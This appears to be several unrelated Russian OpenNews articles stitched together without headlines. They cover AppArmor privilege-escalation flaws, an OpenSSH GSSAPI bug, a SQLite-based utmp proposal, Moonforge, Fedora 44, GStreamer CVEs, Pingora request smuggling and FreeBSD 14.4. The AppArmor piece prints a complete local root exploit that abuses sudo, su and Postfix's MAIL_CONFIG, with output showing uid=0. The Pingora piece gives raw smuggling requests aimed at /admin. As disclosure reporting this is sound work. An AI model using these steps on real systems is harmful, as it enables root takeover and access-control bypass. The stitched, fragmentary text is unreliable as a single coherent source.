Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11, выпущенного в 2017 году, и проявляются в дистрибутивах, использующих AppArmor, таких как Ubuntu, Debian, openSUSE и SUSE (начиная с openSUSE/SUSE 16 по умолчанию задействован SELinux, но AppArmor оставлен в качестве опции). Патчи с устранением уязвимостей переданы разработчикам ядра Linux и в ближайшие дни будут предложены пользователям в составе обновлений 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 и 5.10.253. Исправление также включено в сегодняшние обновления пакетов с ядром для Ubuntu. Попутно в Ubuntu выпущены обновления пакетов sudo, sudo-ldap и util-linux (в состав входит утилита su), в которых устранены недоработки, позволявшие эксплуатировать уязвимость в AppArmor. В Debian обновление в процессе подготовки.

Проблемы вызваны наличием в AppArmor фундаментальной уязвимости класса "обманутый посредник" ("confused-deputy"), позволяющей непривилегированным пользователям загружать, заменять и удалять произвольные профили AppArmor. Данная уязвимость напрямую может использоваться для отключения защиты программ и сервисов от локальных и удалённых атак (через запись псевдофайлов /sys/kernel/security/apparmor/.load, .replace и .remove, например, для снятия ограничений в cupsd и rsyslogd), вызова отказа в обслуживании (через применение запрещающих профилей) и обхода ограничений пространств имён (через загрузку нового AppArmor-профиля "userns", например, для /usr/bin/time, позволяющего создавать неограниченные user namespace).

Возможность замены профилей AppArmor также позволяет добиться получения root-привилегий через привязку к привилегированным утилитам, таким как su и sudo, новых профилей, блокирующих доступ к некоторым системным вызовам. В частности, права root можно получить блокировав операцию setuid (CAP_SETUID) для утилиты sudo в сочетании с манипуляцией переменной окружения MAIL_CONFIG для смены каталога с настройками для почтового сервера Postfix.

Суть метода в том, что при возникновении проблем утилита sudo отправляет администратору письмо, запуская /usr/sbin/sendmail. Блокировав сброс привилегий можно добиться запуска данного процесса с правами root, а выставив перед запуском sudo переменную окружения MAIL_CONFIG можно передать утилите sendmail другие настройки, в том числе указать свой обработчик postdrop, запускаемый при отправке почты.

   $ mkdir /tmp/postfix

   $ cat > /tmp/postfix/main.cf << "EOF"
   command_directory = /tmp/postfix
   EOF

   $ cat > /tmp/postfix/postdrop << "EOF"
   #!/bin/sh
   /usr/bin/id >> /tmp/postfix/pwned
   EOF

   $ chmod -R 0755 /tmp/postfix

   $ apparmor_parser -K -o sudo.pf << "EOF"
   /usr/bin/sudo {
     allow file,
     allow signal,
     allow network,
     allow capability,
     deny capability setuid,
   }
   EOF

  $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace
   Password: 

  $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever

   sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted
   sudo: unable to open /etc/sudoers: Operation not permitted
   sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted
   sudo: error initializing audit plugin sudoers_audit

   $ cat /tmp/postfix/pwned
   uid=0(root) gid=1001(jane) groups=1001(jane),100(users)

В качестве других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux. Показано как получить права root при помощи уязвимостей, вызванных двойным выполнением функции free() и обращением к уже освобождённой области памяти (use‑after‑free) в коде загрузки и замены профилей AppArmor. Например, AppArmor сохраняет профиль в структуре aa_loaddata, память для которой выделяется в slab-кэше kmalloc-192, при этом из-за состояния гонки не исключено обращение к памяти, которую занимала структура, после её освобождения. Данную проблему можно использовать для получения контроля над освобожденной памятью и перераспределения освобождённой страницы памяти для маппинга содержимого файла /etc/passwd и перезаписи строки с паролем root.

1. OpenNews: AppArmor и Yama будут включены в Linux-ядро 2.6.36
2. OpenNews: Root-уязвимость в инструментарии управления пакетами Snap
3. OpenNews: Уязвимости в PAM и libblockdev, позволяющие получить права root в системе
4. OpenNews: Уязвимость в Glibc ld.so, позволяющая получить права root в большинстве дистрибутивов Linux
5. OpenNews: Выявлена возможность обхода ограничений доступа к "user namespace" в Ubuntu

Примечательно, что в своё время разработчики OpenSSH отказались принимать в основной состав изменение для поддержки GSSAPI из-за сомнений в его безопасности. При этом многие дистрибутивы Linux включили данный патч в свои пакеты c OpenSSH. В обиходе встречается несколько версий GSSAPI-патча, но в большинстве из них имеется приводящая к уязвимости ошибка. Исправление пока доступно только в форме патча, изменения в котором сводятся к замене вызова функции sshpkt_disconnect() на ssh_packet_disconnect() в файле kexgsss.c.

В настоящее время наличие уязвимости подтверждено в Debian и Ubuntu. В остальных дистрибутивах применение проблемного патча и его подверженность уязвимости уточняется (SUSE/openSUSE, RHEL, Gentoo, Arch, Fedora). Уязвимость проявляется только при включении в настройках опции "GSSAPIKeyExchange yes". На возможность эксплуатации также влияют опции компилятора с которыми в дистрибутивах собран пакет.

Причиной возникновение уязвимости является ошибка в функции sshpkt_disconnect(), из-за которой процесс не завершался после поступления disconnect-сообщения, что позволяло атакующему на стадии согласования ключей отправить не предусмотренный логикой работы сервера тип GSSAPI-сообщения. После поступления внепланового GSSAPI-сообщения, сервер помещает его в очередь и не прерывает выполнение программы, но при этом не инициализирует переменные, определяющие параметры соединения. В дальнейшем в цикле обработки событий выполняется код, который читает неинициализированную структуру recv_tok из стека (читаются данные, оставшиеся в стеке от прошлого вызова функции), отправляет её привилегированному процессу через IPC и затем передаёт в функцию gss_release_buffer(), которая может вызвать функцию free() и освободить память для некорректного указателя, ссылающегося на случайную область памяти.

1. OpenNews: Уязвимости в Samba, приводящие к переполнению буфера и выходу за границу базового каталога
2. OpenNews: Обновление DNS-сервера BIND c устранением уязвимости, допускающей удалённое выполнение кода
3. OpenNews: Пример анализа потенциально серьезной уязвимости в OpenSSH
4. OpenNews: Уязвимость в поставляемом во FreeBSD варианте OpenSSH, допускающая удалённое выполнение кода
5. OpenNews: Уязвимость в пакетах с OpenSSH из состава RHEL 9, допускающая удалённое выполнение кода

В настоящее время для хранения данных о сеансах и попытках аутентификации в Linux используются следующие бинарные файлы, имеющие фиксированную структуру:

• /var/log/lastlog - время последнего входа (структура "struct lastlog" с полем "ll_time" 32-разрядного типа time_t);
• /var/log/btmp - неудачные попытки входа;
• /var/run/utmp - текущие сеансы;
• /var/log/wtmp - история входов и выходов.

Формат данных файлов был разработан несколько десятилетий назад и имеет ряд фундаментальных ограничений:

• Поле "tv_sec" в структуре "utmpx" и поле "ll_time" в "lastlog" имеют тип "int32_t", значение счётчиков времени на основе которого переполнится 19 января 2038 года. Из-за требований ABI‑совместимости даже на 64-разрядных системах эти поля остаются 32-разрядными, поэтому проблема затронет все установки Linux.
• Фиксированный размер записей не позволяет добавлять новые поля (например, идентификатор контейнера, имя сервиса, IP-адрес) без полной замены формата и перекомпиляции всех утилит.
• Утилиты last, lastb, who и lastlog вынуждены линейно перебирать содержимое файлов. При большом размере журналов без использования индексов, позволяющих эффективно фильтровать записи, нагрузка на систему ввода/вывода и задержки при выполнении запросов становятся неприемлемыми.
• Запись в бинарный файл не является атомарной операцией. При сбое запись может быть частично повреждена.
• Для исключения конфликтов при одновременной записи в журтал несколькими процессами (например, sshd и login) используются flock-блокировки, которые не гарантируют атомарность и могут приводить к взаимным блокировкам.

Автор RFC предлагает полностью отказаться от бинарных форматов в пользу специализированных разделяемых библиотек, использующих SQLite. Для каждого типа журналов создаётся отдельная библиотека с единообразным C-интерфейсом: liblastlog2, libbtmp2, libutmp2 и libwtmp2. Все библиотеки работают с БД, схема которых включает 64-разрядные временные метки (тип INTEGER) и индексы по пользователю и времени. Имеется возможность добавления новых полей без нарушения совместимости (через ALTER TABLE).

Среди доводов в пользу использования SQLite упоминается использование 64-разрядного типа INTEGER для хранения эпохального времени, задействование индексов для снижения ввода/вывода за счёт выборочного обращения к записями вместо полного сканирования, возможность добавления новых полей без изменения существующих записей, поддержка ACID-транзакций, режим WAL (Write-Ahead Logging) для конкурентного доступа без блокировок, проверенная надёжность работы SQLite.

Для обеспечения плавного перехода предлагается стратегия "двойной записи" (dual-write):

• Программы, которые пишут в бинарные файлы (login, sshd, sudo, cron и др.), модифицируются так, чтобы одновременно выполнять запись и в старый бинарный файл, и в новую SQLite-базу через соответствующую библиотеку.
• Разрабатываются новые версии утилит (last2, lastb2, who2, lastlog2), которые читают данные из SQLite-баз, используя индексы для быстрой работы. Старые утилиты продолжают работать с прежними файлами.
• Через несколько лет, когда подавляющее большинство систем обновятся, поддержка записи в старые форматы может быть отключена, а старые утилиты - объявлены устаревшими.

Вопросы, выставленные для дополнительного обсуждения:

• Целесообразность разделения на отдельные библиотеки или объединения в одну (например, libsession2).
• Выбор имён для библиотек и утилит (сохранить исторические названия или перейти к более общим).
• Расположение файлов баз данных (/var/lib/ как для состояния приложений или /var/log/ как для логов).
• Механизм версионирования схемы и миграции.
• Параметры производительности SQLite для различных сценариев (серверы, встраиваемые системы).
• Предоставление fallback-бэкенда, хранящего журналы в упрощённом бинарном формате, для систем, на которых SQLite может оказаться избыточным (например, встраиваемые устройства с жёсткими ограничениями по памяти).

1. OpenNews: Для избавления Glibc от проблемы 2038 года предложено прекратить использование utmp
2. OpenNews: Уязвимость в SQLite, позволяющая удалённо атаковать Chrome через WebSQL
3. OpenNews: Проект Redka развивает реализацию протокола и API Redis поверх SQLite
4. OpenNews: Эксперимент с использованием SQLite в качестве контейнера для архивирования файлов
5. OpenNews: Google использовал большую языковую модель для выявления уязвимости в SQLite

Moonforge предоставляет разработчикам и системным интеграторам каркас, набор файлов конфигурации и коллекцию компонентов для формирования атомарно обновляемых системных образов, основанных на применении уже проверенных и распространённых в индустрии технологий, таких как yocto, bitbake и kas. Для сформированных образов поддерживается упрощённый процесс установки обновлений и обеспечивается длительный цикл сопровождения. Основная цель проекта - предоставить разработчикам встраиваемых систем удобный инструментарий, дающий возможность сосредоточиться на развитии специфичной для их продукта функциональности и не тратить время на задачи, связанные с формированием и поддержанием дистрибутива.

Системный образ компонуется из набора готовых модулей Yocto. Каждый модуль отвечает за определённую возможность или поддержку конкретной целевой аппаратной платформы. Например, предлагаются модули для поддержки Docker, QEMU или Podman, управления обновлениями через RAUC, формирования графического интерфейса на базе композитного сервера Weston, запуска браузерного интерфейса на базе Webkit для интернет-киосков и сборки для плат Raspberri Pi 4 и 5.

Поддерживается три канала распространения релизов: stable (стабильная LTS-ветка), next (ветка, в которой развивается следующий LTS-релиз) и main (экспериментальная ветка, в которой ведётся разработка). Каждая ветка привязана к своей версии набора компонентов Yocto. Стабильная ветка обновляется раз в месяц и соответствует LTS-релизам Yocto.

Обновления доставляются в режиме OTA (Over-The-Air) с использованием инструментария Mender и устанавливаются атомарно через замену целиком всей системы. На накопителе создаётся два идентичных корневых раздела - активный и пассивный. Новое обновление устанавливается в пассивный раздел, никак не влияя на работу активного. После перезагрузки разделы меняются местами - раздел с новым обновлением становится активным, а прошлый активный раздел переводится в пассивный режим и ожидает установки следующего обновления. Если после обновления что-то пошло не так, осуществляется откат на прошлый вариант системы.

Для создания системных образов используется инструментарий BitBake, а для формирования конфигурации и обеспечения воспроизводимых сборок - kas. Сборки, обновления, отчёты об уязвимостях и метаданные SBOM (Software Bill of Materials) автоматически собираются и публикуются с использованием систем непрерывной интеграции и непрерывного развёртывания (CI/CD). Сборочная инфраструктура на базе Moonforge может быть развёрнута как на локальных серверах, так и в публичных или приватных облачных окружениях.

Для прозрачности и предсказуемости процессов создания производных продуктов в дистрибутиве применяется жёсткое разделение между upstream- и downstream-компонентами, позволяющее разработчикам при необходимости добавлять дополнительную функциональность поверх базовой начинки. Конфигурация определяется в декларативном представлении, используя формат YAML, и охватывает такие области как подключение внешних репозиториев, активация модулей Yocto, управление зависимостями между компонентами дистрибутива, применение дополнительных патчей и изменение применяемых по умолчанию системных настроек.

1. OpenNews: Компания Collabora представила Apertis 2024.3, дистрибутив для электронных устройств
2. OpenNews: Дистрибутив Chimera Linux, сочетающий ядро Linux с окружением FreeBSD
3. OpenNews: Доступен Oryx Linux, новый дистрибутив для встраиваемых систем
4. OpenNews: Выпуск дистрибутива для мобильных телефонов NemoMobile 0.7
5. OpenNews: Доступен дистрибутив Amazon Linux 2023

Наиболее значимые изменения в Fedora Linux 44:

• Проведена работа по доведению инфраструктуры для воспроизводимых сборок до охвата не менее чем 99% пакетов в репозитории Fedora. В прошлых выпусках охват воспроизводимыми сборками оценивался в 90%, благодаря внесению в сборочную систему изменений, синхронизирующих метаданные о времени модификации файлов с эталонным исходным кодом, а также обеспечивающих постоянный порядок перечисления метаданных и структур в бинарных файлах. Для обеспечения воспроизводимых сборок в оставшихся 10% к участию были привлечены сопровождающие проблемных пакетов. Воспроизводимые сборки дают пользователю возможность лично убедиться, что распространяемые в пакетах бинарные файлы собраны из предоставляемого исходного кода и не содержат скрытых изменений, осуществлённых в результате компрометации компилятора или сборочного инструментария.
• Во всех вариантах дистрибутива со средой рабочего стола KDE (Fedora KDE Plasma Desktop Edition, Fedora KDE Plasma Mobile Spin и Fedora Kinoite) для настройки системы после установки задействован развиваемый проектом KDE мастер начальной настройки Plasma Setup, а в инсталляторе Anaconda отключены пересекающиеся с данным приложением стадии конфигурирования системы.
• Во всех редакциях с KDE менеджер входа SDDM заменён на Plasma Login Manager, развиваемый проектом KDE.
• Переработана редакция Fedora Games Lab, предлагающая подборку пакетов и настроек для любителей компьютерных игр. В новом варианте обновлён программный стек для запуска игр и задействованы актуальные технологии, такие как Wayland и PipeWire.
• Среда рабочего стола GNOME обновлена до ветки 50, в которой прекращена поддержка X11 и реализована новая система сохранения сеансов.
• Пользовательское окружение Budgie обновлено до ветки 10.10, переведённой на Walyand.
• В инсталляторе Anaconda изменена логика создания в установленной системе сетевых профилей (файлов с настройками для NetworkManager). Подобные профили теперь создаются не для всех имеющихся проводных сетевых устройств, а только для устройств, настроенных в процессе установки через GUI, загрузочные опции или kickstart-файл. Создание профилей для всех доступных устройств, а не только выбранных пользователем, требовало удаления лишних профилей после установки и вызывало трудности при последующей необходимости изменения настроек.
• На системах с архитектурой Аarch64 обеспечен автоматический выбор файла описания оборудования DTB (Device Tree Blobs) для загрузчика UEFI, что решило проблемы с загрузкой Live-сборок Fedora на ARM-ноутбуках, поставляемых с Windows.
• В Live-сборках задействован набор скриптов livesys-scripts для настройки рабочего окружения и новые возможности инструментария Dracut для автоматического создания сохраняемого между перезагрузками оверлейного хранилища при записи образа на USB-накопители.
• Обновлены версии пакетов: GCC 16.1, LLVM 22, Ruby 4.0, Go 1.26, binutils 2.46, glibc 2.43, gdb 16.3, CMake 4.0, MariaDB 11.8, IBus 1.5.34, uutils-coreutils 0.5, nushell 0.109.2, Django 6.x, TagLib 2, Helm 4, Ansible 13, TeXLive 2025, GHC 9.10, PHP 8.5.
• Продолжена работа по переводу инфраструктуры непрерывной интеграции (dist-git CI), выполняющей пересборку RPM-пакетов после внесения изменений или обновления версий, на использование по умолчанию инструментария Packit вместо Fedora CI и Zuul.
• В репозиторий добавлен инструментарий с пакетным менеджером Nix, позволяющий устанавливать пакеты в формате Nix из коллекции nixpkgs. Пакеты можно ставить в однопользовательском (в домашний каталог пользователя) и многопользовательском (в каталог /nix) режимах.
• Включено по умолчанию использование жёстких ссылок для связывания идентичных файлов, устанавливаемых из разных пакетов в иерархию /usr. Создание жёсткой ссылки осуществляется автоматически при установке пакета обработчиком на стадии "post install".
• Прекращена поставка сборок QEMU для 32-разрядных хост-систем (i686). Изменение отражает работу проекта QEMU по удалению поддержки 32-разрядных хост-систем.
• Из состава атомарных редакций Fedora для десктоп систем удалены исполняемые файлы и библиотеки FUSE 2 (ранее данная версия была объявлена устаревшей и все пакеты переведены на использование FUSE 3). Также прекращена поддержка устаревших правил polkit, поставлявшихся в файлах с расширением pkla.
• PackageKit переключён на использование нового бэкенда DNF5, собранного с библиотекой libdnf5.
• В редакции дистрибутива с композитным менеджером MiracleWM оболочка рабочего стола nwg-shell заменена на Dank Material Shell.
• По умолчанию активирован модуль ядра NTSYNC, позволяющий существенно поднять производительность Windows-игр, запускаемых при помощи Wine. Модуль реализует символьное устройство /dev/ntsync и набор примитивов для синхронизации, применяемых в ядре Windows NT. Значительный прирост производительности достигается благодаря избавлению от накладных расходов, связанных с применением RPC в пространстве пользователя.
• В Fedora Cloud вместо отдельного раздела /boot теперь предлагается одноимённый подраздел Btrfs.
• Прекращена поставка пакета libreoffice-KF5 с компонентами для интеграции LibreOffice с Qt5, на смену которому пришёл пакет libreoffice-kf6, обеспечивающий интеграцию с Qt6.

Дополнительно можно отметить инициативу по реформированию процесса разработки Fedora, выставленную на обсуждение Джефом Спалета (Jef Spaleta), лидером проекта Fedora. Джеф предлагает создать "песочницу" для упрощения тестирования новых идей и экспериментирования с новыми технологиями в дистрибутиве, без риска снижения стабильности основного проекта.

Предполагается, что инновационные идеи по развитию дистрибутива будут развиваться бок о бок с основным дистрибутивом, и со временем могут быть интегрированы в основной состав в случае выполнения определённых условий, подтверждения ценности для проекта и наличия интереса других разработчиков. Жизненный цикл экспериментальных технологий подразумевает наличие нескольких этапов становления с рецензированием в контрольных точках, привязанных ко времени, и переходом на другой этап после достижения соответствия определённым для каждого этапа критериям.

1. OpenNews: Выпуск дистрибутива Fedora Linux 43
2. OpenNews: В Fedora утверждены правила использования AI-инструментов при разработке
3. OpenNews: Перенос разработки Fedora с Pagure на платформу совместной разработки Forgejo
4. OpenNews: Стратегия развития проекта Fedora до 2028 года
5. OpenNews: Утверждено обеспечение повторяемых сборок в Fedora 43

• CVE-2026-3085, CVE-2026-3083 - переполнения буфера в плагине rtp, возникающее из-за отсутствия должной проверки размера и данных при обработке полей X-QDM RTP.
• CVE-2026-2923 - переполнение буфера при обработке некорректных координат в субтитрах DVB-SUB.
• CVE-2026-3081 - переполнение буфера из-за некорректной проверки размера структур при разборе формата H.266 (VVC, Versatile Video Coding).
• CVE-2026-3082 - переполнение буфера из-за отутствия должных проверок размера при разборе таблиц Хаффмана в изображениях JPEG.
• CVE-2026-2920 - переполнение буфера из-за отсутствия должных проверок размера при разборе заголовков мультимедийных контейнеров в формате ASF.
• CVE-2026-2922 - переполнение буфера из-за некорректной проверки структур при разборе мультимедийных контейнеров в формате RealMedia.
• CVE-2026-2921 - целочисленное переполнение при разборе RIFF-блоков с палитрой в файлах AVI.
• CVE-2026-3084 - целочисленное переполнение в реализвции кодека H.266 при разборе секций с изображениями.
• CVE-2026-3086 - переполнение буфера в реализвции кодека H.266 при разборе APS-блоков.

Библиотека GStreamer применяется для разбора мультимедийных файлов в приложениях Nautilus (GNOME Files), GNOME Videos и Rhythmbox, а также в развиваемом проектом GNOME поисковом движке localsearch (ранее назывался tracker-miners). Данный движок устанавливается во многих дистрибутивах в качестве зависимости к пакету tracker-extract, применяемому в GNOME для автоматического разбора метаданных в новых файлах. Среди прочего, указанный сервис индексирует все файлы в домашнем каталоге без каких-либо действий со стороны пользователя. Таким образом, для атаки достаточно добиться появления в каталоге пользователя специально созданного мультимедийного файла и уязвимость будет эксплуатирована во время его автоматической индексации.

В большинстве дистрибутивов с GNOME компоненты localsearch (tracker-miners) активируются по умолчанию и загружаются как жёсткая зависимость к файловому менеджеру Nautilus (GNOME Files). При этом начиная c GNOME 46 процесс localsearch запускается с использованием sandbox-изоляции. Для отключения извлечения метаданных можно удалить файлы с правилами из каталога /usr/share/localsearch3/extract-rules/ или /usr/share/tracker3-miners/extract-rules/.

Уязвимости устранены в обновлении GStreamer 1.28.1. Статус устранения уязвимостей в дистрибутивах можно оценить на данных страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, SUSE, RHEL, Gentoo, Arch, Fedora, FreeBSD.

1. OpenNews: Доступен мультимедийный фреймворк GStreamer 1.28.0
2. OpenNews: В мультимедийном фреймворке GStreamer выявлено 29 уязвимостей
3. OpenNews: Уязвимости в GStreamer, приводящие к выполнению кода при обработке файлов SRT и PGS
4. OpenNews: Уязвимости в VLC и GStreamer, способные привести к выполнению кода при обработке контента
5. OpenNews: Уязвимость в библиотеке libgsf, затрагивающая GNOME

Две наиболее опасные уязвимости допускают проведение атак класса "HTTP Request Smuggling", позволяющих обходить системы ограничения доступа и вклиниваться в содержимое запросов других пользователей, обрабатываемых в том же потоке между фронтэндом и бэкендом (например, для подстановки вредоносного JavaScript-кода в сеанс другого пользователя с сайтом). Проблемы выявлены участником программы Bug Bounty, предусматривающей выплату вознаграждения за обнаружение уязвимостей.

В схеме с обращением к бэкенду через обратный прокси запросы клиентов принимает дополнительный узел, который устанавливает длительно действующее TCP-соединение с бэкендом, осуществляющим непосредственную обработку запросов. Через данное общее соединение обычно передаются запросы разных пользователей, которые следуют по цепочке один за другим с разделением средствами протокола HTTP. Атаки класса HTTP Request Smuggling возникают из-за разной трактовки HTTP-заголовков и спецификаций протокола HTTP на фронтэндах и бэкендах, например, когда фронтэнд использует для определения размера запроса HTTP-заголовок "Content-Length", а бэкенд "Transfer-Encoding: chunked".

Первая уязвимость CVE-2026-2835 присутствует в коде разбора запросов HTTP/1.0 и вызвана некорректной обработкой заголовка "Transfer-Encoding" с несколькими значениями, а также использованием закрытия соединения как признака конца тела запроса (close-delimited). Pingora проверял только вариант "Transfer-Encoding: chunked" и игнорировал данный заголовок, если в нём указывалось несколько значений. В этой ситуации Pingora не учитывал размер в заголовке "Content-Length", а считал телом запроса все данные, полученные до закрытия соединения.

Через указание нескольких значений в заголовке "Transfer-Encoding" атакущий мог создать условия, при которых на бэкенд перенаправлялся запрос, фактический размер которого не соответствовал размеру chunked-цепочки, вычисленному на основе заголовка "Transfer-Encoding. Pingora перенаправлял все полученные данные как один запрос, а бэкенд, например, Node.js, вычислял запрос на основе "Transfer-Encoding: chunked" и оставшийся хвост обрабатывал как начало другого запроса.

   GET / HTTP/1.0
   Host: example.com
   Connection: keep-alive
   Transfer-Encoding: identity, chunked
   Content-Length: 29

   0

   GET /admin HTTP/1.1
   X:

Вторая уязвимость CVE-2026-2833 вызвана некорректной обработкой HTTP-заголовка "Upgrade" в запросах HTTP/1.1. При наличии в запросе заголовка "Upgrade" прокси сразу пробрасывал к бэкенду и остальные данные запроса, следующие за заголовком "Upgrade", не дожидаясь от бэкенда ответа с кодом 101 (Switching Protocols). Из-за этого синхронизация потока между прокси и бэкендом нарушалась и бэкенд воспринимал отправленные после заголовка "Upgrade" данные как отдельный запрос, и отправлял результат выполнения этого запроса в ответ на пришедший следом запрос другого пользователя.

   GET / HTTP/1.1
   Host: example.com
   Upgrade: foo


   GET /admin HTTP/1.1
   Host: example.com

Проблемы проявляются при использовании Pingora в форме обратного прокси (ingress proxy), транслирующего запросы пользователей к бэкендам с использованием протоколов HTTP/1.0 или HTTP/1.1. Применяемая в сети доставки контента Cloudflare конфигурация Pingora не позволяла эксплуатировать уязвимости, так как Pingora в CDN не используется в роли ingress-прокси, перенаправляет запросы только с использованием протокола HTTP/1.1, блокирует запросы с некорректными значениями Content-Length, перенаправляет только одно значение заголовка "Transfer-Encoding: chunked" и подставляет в запросы с заголовком "Upgrade:" дополнительный заголовок "Connection: close", не позволяющий передавать дополнительные запросы в том же соединении.

Третья уязвимость CVE-2026-2836 (степень опасности 8.4 из 10) приводит к отравлению кэша (cache poisoning) из-за генерации ключа размещения данных в кэше (CacheKey) только на основе пути из URI, игнорируя содержимое заголовка "Host". Подобная недоработка приводит к формированию одинаковых ключей кэширования для одинаковых HTTP-путей к разным хостам. Уязвимость может использоваться для подмены содержимого кэша при использовании режима кэширования для нескольких хостов. В Pingora кэширование является экспериментальной функцией, не рекомендованной для рабочих внедрений.

1. OpenNews: Выпуск Pingora 0.7, фреймворка для создания сетевых сервисов
2. OpenNews: SMTP Smuggling - новая техника спуфинга почтовых сообщений
3. OpenNews: Атака Continuation flood, приводящая к проблемам на серверах, использующих HTTP/2.0
4. OpenNews: Атака на системы фронтэнд-бэкенд, позволяющая вклиниться в сторонние запросы
5. OpenNews: Новая атака на системы фронтэнд-бэкенд, позволяющая вклиниться в запросы

Следующее обновление FreeBSD 14.5 запланировано на сентябрь 2026 года. Поддержка нынешнего выпуска FreeBSD 14.4 будет осуществляться до 31 декабря 2026 года, а прошлого выпуска FreeBSD 14.3 - до 30 июня 2026 года. В целом ветка FreeBSD 14 будет сопровождаться до 30 ноября 2028 года, а ветка FreeBSD 13.x до 30 апреля 2026 года. Параллельно развивается ветка FreeBSD 15, следующий выпуск (15.1) в которой намечен на 2 июня 2026 года.

Основные изменения во FreeBSD 14.4:

• Добавлена утилита sndctl для управления настройками звуковых карт.
• В утилиту swapon добавлена поддержка шифрованных файлов подкачки, для определения которых через fstab можно использовать md-устройства с суффиксом ".eli".
• В утилиту nuageinit, выполняющую инициализацию виртуальных машин, добавлена поддержка cloud-init, конфигурирования по сети и управления пакетами. Для совместимости с cloud-init добавлены команды 'runcmd', 'packages', 'fqdn', 'hostname', 'sudo', 'write_files', 'nameservers', 'tzsetup' и 'doas'. Реализован полноценный парсер формата YAML. Включено ведение лога. Реализованы команды "chpasswd", 'wakeonlan', 'set-name' и 'match.driver'.
• Консольный шрифт spleen обновлён до версии 2.2.0 и расширен дополнительными символами (длинное тире, короткое тире, дефис, угловые скобки, белый квадрат, крест и двойной крест). Улучшено выравнивание символов на экранах с высокой плотностью пикселей. В консольный шрифт gallant, который теперь включает более 4300 глифов, добавлена поддержка кириллицы и наборов с математическими символами, стрелками , валютами и рамками.
• В состав включена файловая система 9P (p9fs), которую можно использовать с устройствами virtio-9p и гипервизором Bhyve для организации доступа из виртуальных машин к содержимому файловой системы хост-окружения. Для загрузки драйвера в loader.conf следует использовать настройку "virtio_p9fs_load=YES".
• В файловой системе tarfs налажена возможность работы с файлами размером более 4 ГБ.
• В ФС unionfs и nullfs усилена проверка корневых vnode при обработке путей с ".." для блокирования потенциальных уязвимостей, позволяющих выйти за пределы корневого каталога jail-окружения.
• В подсистеме Jail ограничен доступ непривилегированных пользователей из родительского Jail к выполнению отладки, настройке планировщика и отправке сигналов процессам, работающим в дочерних Jail. Для выполнения подобных операций предложены отдельные привилегии PRIV_SCHED_DIFFJAIL, PRIV_DEBUG_DIFFJAIL и PRIV_SIGNAL_DIFFJAIL. Для возвращения старого поведения в управлении процессами в Jail добавлена настройка "allow.nounprivileged_parent_tampering".
• В подсистему Jail добавлена поддержка параметров "met" и "env", при помощи которых к Jail-окружениям можно привязывать произвольные строковые метаданные и данные об окружении. Параметры могут задаваться при создании Jail, изменяться командой "jail -cm" и просматриваться командой jls. Например, 'jail -cm ... meta="tag1=value1 tag2=value2" env="configuration"'. Для ограничения максимального размера данных в параметрах предложена sysctl-настройка "security.jail.meta_maxbufsize".
• В утилиту ngctl добавлен флаг "-j" для запуска команд внутри указанного Jail-окружения. Добавленный флаг позволяет манипулировать узлами netgraph в изолированных окружениях, в которых не установлена утилита ngctl.
• Расширены возможности утилиты mdo, позволяющей запускать команды под другим пользователем по аналогии с утилитой "su", но используя вместо setuid модуль ядра mac_do и системный вызов setcred. В новой версии реализованы опции для управления идентификаторами пользователей и групп в запускаемых процессах: "-k" для сохранения текущих пользователей; "-g" и "-G" для выставления основной и дополнительной групп; "-s" для изменения дополнительных групп; "--euid", "--ruid", "--svuid", "--egid", "--rgid" и "--svgid" для переопределения заданных идентификаторов.
• В утилиту kadmin, предназначенную для управления Kerberos, добавлена опция "-f" для дампа БД Heimdal KDC в формате, совместимом с MIT KDC, что позволяет выполнить миграцию с Heimdal Kerberos на MIT Kerberos без полного пересоздания БД.
• В поставляемом в базовой системе урезанном варианте пакетного менеджера pkg(7) разбор опций унифицирован с полной версией инструментария pkg(8). Порядок опций для команд в pkg(7) теперь должен соответствовать поведению pkg(8), например, вместо "pkg -f bootstrap" следует указывать "pkg bootstrap -f".
• В инсталляторе bsdinstall прекращена поддержка установки с использованием файловой системой ZFS на дисках с MBR (ZFS можно использовать только на дисках с GPT). Обеспечено копирование загрузчика loader.efi во все ESP (EFI System Partition), созданные на дисках с ZFS, на случай если основной диск выйдет из строя.
• В утилите freebsd-update обеспечен строгий порядок установки разделяемых библиотек: libsys, libc, libthr и затем остальные, что исключает возникновение проблем при обновлении с FreeBSD 14.x до ветки 15.x.
• В утилиту newfs добавлен флаг "-u" для отключения по умолчанию механизма "soft updates" и журналирования для ФС UFS2.
• В PAM-библиотеках (Pluggable Authentication Modules) обеспечен поиск модулей в каталоге "${LOCALBASE}/lib/security" в дополнение к каталогу "${LOCALBASE}/lib".
• В беспроводной стек net80211 добавлена поддержка каналов VHT160 и VHT80P80, используемых в современных точках доступа.
• Расширена поддержка оборудования. В драйвер iwlwifi для беспроводных адаптеров Intel добавлена поддержка ACPI. В драйверы ix и ixv добавлена поддержка семейства сетевых карт Intel Ethernet E610 2.5G/5G/10G. В драйверы mfi и mrsas добавлена поддержка RAID-контроллеров Fujitsu SAS 6Gbit/s 1GB (D3116), применяемых на серверах Fujitsu PRIMERGY.
• В формируемые образы SD-карт добавлена поддержка плат Raspberry Pi Zero 2W.
• Фоновый процесс blacklistd, обеспечивающий динамическую блокировку сетевых портов для защиты от DoS-атак, обновлён и переименован в blocklistd.
• В состав базовой системы включён пакет с Lua-биндингами для libyaml.
• OpenSSH обновлён с выпуска 9.9p2 до 10.0p2 с включением по умолчанию гибридного алгоритма mlkem768x25519-sha256, стойкого от побора на квантовом компьютере.
• Обновлены версии сторонних компонентов: OpenZFS 2.2.9 (была 2.2.7), OpenSSL 3.0.16, SQLite 3.50.4, unbound 1.24.1, libucl 0.9.2, expat 2.7.3, libyaml 0.2.5, libarchive 3.8.5, xz 5.8.2, less 685, bmake 20251111, bc 7.1.0.
• В базовые установочные носители (bootonly) добавлены пакеты с прошивками для беспроводных устройств, позволяющими использовать беспроводное соединение для извлечения по сети установочных файлов.
